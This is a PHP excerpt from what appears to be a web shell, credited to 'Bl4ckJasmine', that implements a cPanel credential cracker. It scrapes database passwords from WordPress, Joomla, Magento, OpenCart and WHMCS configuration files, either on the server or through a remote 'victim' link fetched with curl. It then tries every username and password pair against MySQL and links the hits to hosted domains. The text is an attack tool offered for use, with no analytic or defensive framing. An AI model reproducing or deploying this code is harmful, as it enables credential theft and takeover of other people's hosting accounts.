<?phpelseif($_GET['njing'] == 'cpanel') { if($_POST['crack']) { $user

1. <?php
2. elseif($_GET['njing'] == 'cpanel') {
3. if($_POST['crack']) {
4. $usercp = explode("\r\n", $_POST['user_cp']);
5. $passcp = explode("\r\n", $_POST['pass_cp']);
6. $i = 0;
7. foreach($usercp as $ucp) {
8. foreach($passcp as $pcp) {
9. $connect = mysql_connect('localhost', $ucp, $pcp);
10. if($connect) {
11. if($_SESSION[$ucp] && $_SESSION[$pcp]) {
12. } else {
13. $_SESSION[$ucp] = "1";
14. $_SESSION[$pcp] = "1";
15. if($ucp === '' || $pcp === '') {
16. //
17. } else {
18. $i++;
19. print "username (".color(1, 2, $ucp).") password (".color(1, 2, $pcp).") domain (";
20. if(!function_exists('posix_getpwuid')) print color(1, 1, "Function is Disable by System!");
21. if(!getdomainname()) print color(1, 1, "Can't get domain name");
22. foreach(getdomainname() as $domain) {
23. $userdomain = (object) @posix_getpwuid(@fileowner("/etc/valiases/$domain"));
24. $userdomain = $userdomain->name;
25. if($userdomain === $user) {
26. print "<a href='http://$domain/' target='_blank'>".color(1, 2, $domain)."</a><br>";
27. break;
28. }
29. }
30. print (empty($domain)) ? color(1, 1, "Can't get domain name.") : color(1, 2, $domain);
31. print ")<br>";
32. }
33. }
34. mysql_close($connect);
35. }
36. }
37. }
38. print ($i === 0) ? "" : "<p>".color(1, 3, "u found $i cPanel by Bl4ckJasmine")."</p>";
39. } else {
40. print "<center>
41.  
42. <form method='post'>
43. USER: <br>
44. <textarea style='width: 450px; height: 150px;' name='user_cp'>";
45. print implode("\n", getuser());
46. print "</textarea><br>
47. PASS: <br>
48. <span>Grab Password from Link Config:</span><br>
49. <input style='width: 425px; background: transparent; border: 1px solid #ffffff; color: #ffffff;' type='text' name='linkpass' placeholder='victim/blacksym/'>
50. <input style='background: transparent; border: 1px solid #ffffff; color: #ffffff;' type='submit' name='submitlink' value='>>'>
51. <br>
52. <textarea style='width: 450px; height: 200px;' name='pass_cp'>";
53.  
54. if(isset($_POST['submitlink'])) {
55. $getpass = $_POST['linkpass'];
56. $get = curl($_POST['linkpass'])['response'];
57. preg_match_all('/<a href="(.*?).txt">/', $get, $link);
58. foreach($link[1] as $link_config) {
59. $scandir[] = "$link_config.txt";
60. }
61. }
62. else {
63. $getpass = path();
64. $scandir = scandir($getpass);
65. }
66.  
67. $password = "";
68.  
69. foreach($scandir as $files) {
70. $file = "$getpass/$files";
71. $config = file_get_contents($file);
72. if(preg_match("/WordPress/", $config)) {
73. $password .= getValue($config, "DB_PASSWORD', '", "'")."\n";
74. }
75. elseif(preg_match("/JConfig|joomla/", $config)) {
76. $password .= getValue($config, "password = '", "'")."\n";
77. }
78. elseif(preg_match("/Magento|Mage_Core/", $config)) {
79. $password .= getValue($config, "<password><![CDATA[", "]]></password>")."\n";
80. }
81. elseif(preg_match("/panggil fungsi validasi xss dan injection/", $config)) {
82. $password .= getValue($config, 'password = "', '"')."\n";
83. }
84. elseif(preg_match("/HTTP_SERVER|HTTP_CATALOG|DIR_CONFIG|DIR_SYSTEM/", $config)) {
85. $password .= getValue($config, "'DB_PASSWORD', '", "'")."\n";
86. }
87. elseif(preg_match("/^[client]$/", $config)) {
88. preg_match("/password=(.*?)/", $config, $pass);
89. if(preg_match('/"/', $pass[1])) {
90. $pass[1] = str_replace('"', "", $pass[1]);
91. $password .= $pass[1]."\n";
92. }
93. else {
94. $password .= $pass[1]."\n";
95. }
96. }
97. elseif(preg_match("/cc_encryption_hash/", $config)) {
98. $password .= getValue($config, "db_password = '", "'")."\n";
99. }
100. }
101.  
102. print $password;
103.  
104. print "</textarea><br>
105. <input style='background: transparent; color: #ffffff; border: 1px solid #ffffff; width: 460px;' type='submit' name='crack' value='Crack'>
106. </form></center>";
107. }
108. }
109. ?>